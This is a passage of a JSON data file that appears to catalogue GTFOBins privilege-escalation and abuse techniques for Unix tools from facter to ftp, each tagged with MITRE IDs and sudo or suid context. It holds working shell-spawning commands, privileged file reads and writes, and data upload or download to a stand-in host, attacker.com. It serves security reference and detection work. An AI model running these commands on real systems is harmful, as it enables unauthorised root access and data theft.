executed.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/facter/"]},{"id":"gtfo:facter:inherit:1:unprivileged","toolId":"gtfo:facter","toolName":"facter","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"facter --custom-dir=/path/to/dir/ x","description":"The first `.rb` file in the `/path/to/dir/` directory will be executed.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/facter/"]},{"id":"gtfo:fail2ban-client:command:0:sudo","toolId":"gtfo:fail2ban-client","toolName":"fail2ban-client","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"fail2ban-client add x\nfail2ban-client set x addaction x\nfail2ban-client set x action x actionban /path/to/command\nfail2ban-client start x\nfail2ban-client set x banip 999.999.999.999\nfail2ban-client set x unbanip 999.999.999.999\nfail2ban-client stop x","description":"The subprocess is immediately sent to the background, but `fail2ban-client` waits on a return code from the subprocess. The `banip` command will hang until the subprocess returns.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fail2ban-client/"]},{"id":"gtfo:fail2ban-client:command:1:sudo","toolId":"gtfo:fail2ban-client","toolName":"fail2ban-client","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"cat >/path/to/temp-dir/fail2ban.conf <<EOF\n[Definition]\nEOF\n\ncat >/path/to/temp-dir/jail.local <<EOF\n[x]\nenabled = true\naction = x\nEOF\n\nmkdir -p /path/to/temp-dir/action.d/\ncat >/path/to/temp-dir/action.d/x.conf <<EOF\n[Definition]\nactionstart = /path/to/command\nEOF\n\nmkdir -p /path/to/temp-dir/filter.d/\ncat >/path/to/temp-dir/filter.d/x.conf <<EOF\n[Definition]\nEOF\n\nfail2ban-client -c /path/to/temp-dir/ -v restart","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fail2ban-client/"]},{"id":"gtfo:fastfetch:command:0:sudo","toolId":"gtfo:fastfetch","toolName":"fastfetch","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo '{\"modules\":[{\"type\":\"command\",\"key\":\"x\",\"text\":\"exec /path/to/command\"}]}' >/path/to/temp-file.jsonc\nfastfetch -c /path/to/temp-file.jsonc","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fastfetch/"]},{"id":"gtfo:fastfetch:command:0:suid","toolId":"gtfo:fastfetch","toolName":"fastfetch","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo '{\"modules\":[{\"type\":\"command\",\"key\":\"x\",\"text\":\"exec /path/to/command\"}]}' >/path/to/temp-file.jsonc\nfastfetch -c /path/to/temp-file.jsonc","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fastfetch/"]},{"id":"gtfo:fastfetch:command:0:unprivileged","toolId":"gtfo:fastfetch","toolName":"fastfetch","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"echo '{\"modules\":[{\"type\":\"command\",\"key\":\"x\",\"text\":\"exec /path/to/command\"}]}' >/path/to/temp-file.jsonc\nfastfetch -c /path/to/temp-file.jsonc","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fastfetch/"]},{"id":"gtfo:fastfetch:file-read:0:sudo","toolId":"gtfo:fastfetch","toolName":"fastfetch","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fastfetch --file /path/to/input-file","description":"The file content is used as the logo while some other information is displayed on its right.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fastfetch/"]},{"id":"gtfo:fastfetch:file-read:0:suid","toolId":"gtfo:fastfetch","toolName":"fastfetch","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fastfetch --file /path/to/input-file","description":"The file content is used as the logo while some other information is displayed on its right.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fastfetch/"]},{"id":"gtfo:fastfetch:file-read:0:unprivileged","toolId":"gtfo:fastfetch","toolName":"fastfetch","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"fastfetch --file /path/to/input-file","description":"The file content is used as the logo while some other information is displayed on its right.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fastfetch/"]},{"id":"gtfo:fastfetch:shell:0:sudo","toolId":"gtfo:fastfetch","toolName":"fastfetch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '{\"modules\":[{\"type\":\"command\",\"key\":\"x\",\"text\":\"exec /bin/sh 1>&0 2>&0\"}]}' >/path/to/temp-file.jsonc\nfastfetch -c /path/to/temp-file.jsonc","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fastfetch/"]},{"id":"gtfo:fastfetch:shell:0:suid","toolId":"gtfo:fastfetch","toolName":"fastfetch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '{\"modules\":[{\"type\":\"command\",\"key\":\"x\",\"text\":\"exec /bin/sh 1>&0 2>&0\"}]}' >/path/to/temp-file.jsonc\nfastfetch -c /path/to/temp-file.jsonc","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fastfetch/"]},{"id":"gtfo:fastfetch:shell:0:unprivileged","toolId":"gtfo:fastfetch","toolName":"fastfetch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '{\"modules\":[{\"type\":\"command\",\"key\":\"x\",\"text\":\"exec /bin/sh 1>&0 2>&0\"}]}' >/path/to/temp-file.jsonc\nfastfetch -c /path/to/temp-file.jsonc","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fastfetch/"]},{"id":"gtfo:ffmpeg:library-load:0:sudo","toolId":"gtfo:ffmpeg","toolName":"ffmpeg","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"ffmpeg -f lavfi -i anullsrc -af ladspa=file=/path/to/lib.so /path/to/temp-file.wav\nreset^J","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ffmpeg/"]},{"id":"gtfo:ffmpeg:library-load:0:suid","toolId":"gtfo:ffmpeg","toolName":"ffmpeg","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"ffmpeg -f lavfi -i anullsrc -af ladspa=file=/path/to/lib.so /path/to/temp-file.wav\nreset^J","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ffmpeg/"]},{"id":"gtfo:ffmpeg:library-load:0:unprivileged","toolId":"gtfo:ffmpeg","toolName":"ffmpeg","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"ffmpeg -f lavfi -i anullsrc -af ladspa=file=/path/to/lib.so /path/to/temp-file.wav\nreset^J","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ffmpeg/"]},{"id":"gtfo:fgrep:file-read:0:sudo","toolId":"gtfo:fgrep","toolName":"fgrep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fgrep/"]},{"id":"gtfo:fgrep:file-read:0:suid","toolId":"gtfo:fgrep","toolName":"fgrep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fgrep/"]},{"id":"gtfo:fgrep:file-read:0:unprivileged","toolId":"gtfo:fgrep","toolName":"fgrep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fgrep/"]},{"id":"gtfo:file:file-read:0:sudo","toolId":"gtfo:file","toolName":"file","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"file -f /path/to/input-file","description":"Each input line is treated as a filename for the `file` command and the output is corrupted by a suffix `:` followed by the result or the error of the operation.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/file/"]},{"id":"gtfo:file:file-read:0:suid","toolId":"gtfo:file","toolName":"file","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"file -f /path/to/input-file","description":"Each input line is treated as a filename for the `file` command and the output is corrupted by a suffix `:` followed by the result or the error of the operation.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/file/"]},{"id":"gtfo:file:file-read:0:unprivileged","toolId":"gtfo:file","toolName":"file","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"file -f /path/to/input-file","description":"Each input line is treated as a filename for the `file` command and the output is corrupted by a suffix `:` followed by the result or the error of the operation.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/file/"]},{"id":"gtfo:file:file-read:1:sudo","toolId":"gtfo:file","toolName":"file","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"file -m /path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside quotes.\n\nIf a line in the target file begins with a `#`, it will not be printed as these lines are parsed as comments.\n\nIt can also be provided with a directory and will read each file in the directory.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/file/"]},{"id":"gtfo:file:file-read:1:suid","toolId":"gtfo:file","toolName":"file","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"file -m /path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside quotes.\n\nIf a line in the target file begins with a `#`, it will not be printed as these lines are parsed as comments.\n\nIt can also be provided with a directory and will read each file in the directory.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/file/"]},{"id":"gtfo:file:file-read:1:unprivileged","toolId":"gtfo:file","toolName":"file","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"file -m /path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside quotes.\n\nIf a line in the target file begins with a `#`, it will not be printed as these lines are parsed as comments.\n\nIt can also be provided with a directory and will read each file in the directory.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/file/"]},{"id":"gtfo:find:file-read:0:sudo","toolId":"gtfo:find","toolName":"find","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"find /path/to/input-file -exec cat {} \\;","description":"This uses `cat` to actually read the file, but since permissions are not dropped, it's executed with the same privileges as `find`.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/find/"]},{"id":"gtfo:find:file-read:0:suid","toolId":"gtfo:find","toolName":"find","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"find /path/to/input-file -exec cat {} \\;","description":"This uses `cat` to actually read the file, but since permissions are not dropped, it's executed with the same privileges as `find`.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/find/"]},{"id":"gtfo:find:file-read:0:unprivileged","toolId":"gtfo:find","toolName":"find","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"find /path/to/input-file -exec cat {} \\;","description":"This uses `cat` to actually read the file, but since permissions are not dropped, it's executed with the same privileges as `find`.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/find/"]},{"id":"gtfo:find:file-write:0:sudo","toolId":"gtfo:find","toolName":"find","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"find / -fprintf /path/to/output-file DATA -quit","description":"`DATA` is a format string, it supports some escape sequences.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/find/"]},{"id":"gtfo:find:file-write:0:suid","toolId":"gtfo:find","toolName":"find","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"find / -fprintf /path/to/output-file DATA -quit","description":"`DATA` is a format string, it supports some escape sequences.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/find/"]},{"id":"gtfo:find:file-write:0:unprivileged","toolId":"gtfo:find","toolName":"find","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"find / -fprintf /path/to/output-file DATA -quit","description":"`DATA` is a format string, it supports some escape sequences.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/find/"]},{"id":"gtfo:find:shell:0:sudo","toolId":"gtfo:find","toolName":"find","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"find . -exec /bin/sh \\; -quit","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/find/"]},{"id":"gtfo:find:shell:0:suid","toolId":"gtfo:find","toolName":"find","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"find . -exec /bin/sh -p \\; -quit","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/find/"]},{"id":"gtfo:find:shell:0:unprivileged","toolId":"gtfo:find","toolName":"find","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"find . -exec /bin/sh \\; -quit","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/find/"]},{"id":"gtfo:finger:download:0:sudo","toolId":"gtfo:finger","toolName":"finger","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"finger x@attacker.com","description":"The command hangs waiting for the remote peer to close the socket.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/finger/"]},{"id":"gtfo:finger:download:0:suid","toolId":"gtfo:finger","toolName":"finger","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"finger x@attacker.com","description":"The command hangs waiting for the remote peer to close the socket.","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/finger/"]},{"id":"gtfo:finger:download:0:unprivileged","toolId":"gtfo:finger","toolName":"finger","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"finger x@attacker.com","description":"The command hangs waiting for the remote peer to close the socket.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/finger/"]},{"id":"gtfo:finger:upload:0:sudo","toolId":"gtfo:finger","toolName":"finger","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"finger DATA@attacker.com","description":"The command hangs waiting for the remote peer to close the socket.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/finger/"]},{"id":"gtfo:finger:upload:0:suid","toolId":"gtfo:finger","toolName":"finger","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"finger DATA@attacker.com","description":"The command hangs waiting for the remote peer to close the socket.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/finger/"]},{"id":"gtfo:finger:upload:0:unprivileged","toolId":"gtfo:finger","toolName":"finger","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"finger DATA@attacker.com","description":"The command hangs waiting for the remote peer to close the socket.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/finger/"]},{"id":"gtfo:firejail:shell:0:sudo","toolId":"gtfo:firejail","toolName":"firejail","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"firejail /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/firejail/"]},{"id":"gtfo:firejail:shell:0:unprivileged","toolId":"gtfo:firejail","toolName":"firejail","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"firejail /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/firejail/"]},{"id":"gtfo:fish:shell:0:sudo","toolId":"gtfo:fish","toolName":"fish","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"fish","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fish/"]},{"id":"gtfo:fish:shell:0:suid","toolId":"gtfo:fish","toolName":"fish","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"fish","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fish/"]},{"id":"gtfo:fish:shell:0:unprivileged","toolId":"gtfo:fish","toolName":"fish","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"fish","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fish/"]},{"id":"gtfo:flock:shell:0:sudo","toolId":"gtfo:flock","toolName":"flock","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"flock -u / /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/flock/"]},{"id":"gtfo:flock:shell:0:suid","toolId":"gtfo:flock","toolName":"flock","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"flock -u / /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/flock/"]},{"id":"gtfo:flock:shell:0:unprivileged","toolId":"gtfo:flock","toolName":"flock","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"flock -u / /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/flock/"]},{"id":"gtfo:fmt:file-read:0:sudo","toolId":"gtfo:fmt","toolName":"fmt","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fmt -pNON_EXISTING_PREFIX /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fmt/"]},{"id":"gtfo:fmt:file-read:0:suid","toolId":"gtfo:fmt","toolName":"fmt","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fmt -pNON_EXISTING_PREFIX /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fmt/"]},{"id":"gtfo:fmt:file-read:0:unprivileged","toolId":"gtfo:fmt","toolName":"fmt","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"fmt -pNON_EXISTING_PREFIX /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fmt/"]},{"id":"gtfo:fmt:file-read:1:sudo","toolId":"gtfo:fmt","toolName":"fmt","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fmt -999 /path/to/input-file","description":"This corrupts the output by wrapping very long lines at the given width (`999`).","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fmt/"]},{"id":"gtfo:fmt:file-read:1:suid","toolId":"gtfo:fmt","toolName":"fmt","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fmt -999 /path/to/input-file","description":"This corrupts the output by wrapping very long lines at the given width (`999`).","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fmt/"]},{"id":"gtfo:fmt:file-read:1:unprivileged","toolId":"gtfo:fmt","toolName":"fmt","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"fmt -999 /path/to/input-file","description":"This corrupts the output by wrapping very long lines at the given width (`999`).","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fmt/"]},{"id":"gtfo:fold:file-read:0:sudo","toolId":"gtfo:fold","toolName":"fold","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fold -w999 /path/to/input-file","description":"This corrupts the output by wrapping very long lines at the given width (`999`).","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fold/"]},{"id":"gtfo:fold:file-read:0:suid","toolId":"gtfo:fold","toolName":"fold","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fold -w999 /path/to/input-file","description":"This corrupts the output by wrapping very long lines at the given width (`999`).","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fold/"]},{"id":"gtfo:fold:file-read:0:unprivileged","toolId":"gtfo:fold","toolName":"fold","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"fold -w999 /path/to/input-file","description":"This corrupts the output by wrapping very long lines at the given width (`999`).","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fold/"]},{"id":"gtfo:forge:shell:0:sudo","toolId":"gtfo:forge","toolName":"forge","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '#!/bin/sh' >/path/to/temp-file\necho -e \"/bin/sh <$(tty) >$(tty) 2>$(tty)\" >>/path/to/temp-file\nchmod +x /path/to/temp-file\nforge build --use /path/to/temp-file","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/forge/"]},{"id":"gtfo:forge:shell:0:suid","toolId":"gtfo:forge","toolName":"forge","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '#!/bin/sh' >/path/to/temp-file\necho -e \"/bin/sh <$(tty) >$(tty) 2>$(tty)\" >>/path/to/temp-file\nchmod +x /path/to/temp-file\nforge build --use /path/to/temp-file","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/forge/"]},{"id":"gtfo:forge:shell:0:unprivileged","toolId":"gtfo:forge","toolName":"forge","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '#!/bin/sh' >/path/to/temp-file\necho -e \"/bin/sh <$(tty) >$(tty) 2>$(tty)\" >>/path/to/temp-file\nchmod +x /path/to/temp-file\nforge build --use /path/to/temp-file","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/forge/"]},{"id":"gtfo:fping:file-read:0:sudo","toolId":"gtfo:fping","toolName":"fping","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fping -f /path/to/input-file","description":"Each line is treated as an hostname and it's leaked as an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fping/"]},{"id":"gtfo:fping:file-read:0:suid","toolId":"gtfo:fping","toolName":"fping","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fping -f /path/to/input-file","description":"Each line is treated as an hostname and it's leaked as an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fping/"]},{"id":"gtfo:fping:file-read:0:unprivileged","toolId":"gtfo:fping","toolName":"fping","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"fping -f /path/to/input-file","description":"Each line is treated as an hostname and it's leaked as an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fping/"]},{"id":"gtfo:ftp:download:0:sudo","toolId":"gtfo:ftp","toolName":"ftp","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"ftp -a attacker.com\nget /path/to/input-file output-file","description":"Instead of `-a`, credentials can be supplied via the `user:password@host` connection string.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ftp/"]},{"id":"gtfo:ftp:download:0:suid","toolId":"gtfo:ftp","toolName":"ftp","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"ftp -a attacker.com\nget /path/to/input-file output-file","description":"Instead of `-a`, credentials can be supplied via the `user:password@host` connection string.","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ftp/"]},{"id":"gtfo:ftp:download:0:unprivileged","toolId":"gtfo:ftp","toolName":"ftp","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"ftp -a attacker.com\nget /path/to/input-file output-file","description":"Instead of `-a`, credentials can be supplied via the `user:password@host` connection string.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ftp/"]},{"id":"gtfo:ftp:shell:0:sudo","toolId":"gtfo:ftp","toolName":"ftp","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ftp\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ftp/"]},{"id":"gtfo:ftp:shell:0:suid","toolId":"gtfo:ftp","toolName":"ftp","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ftp\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ftp/"]},{"id":"gtfo:ftp:shell:0:unprivileged","toolId":"gtfo:ftp","toolName":"ftp","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ftp\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ftp/"]},{"id":"gtfo:ftp:upload:0:sudo","toolId":"gtfo:ftp","toolName":"ftp","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"ftp -a attacker.com\nput /path/to/input-file output-file","description":"Instead of `-a`, credentials can be supplied via the `user:password@host` connection 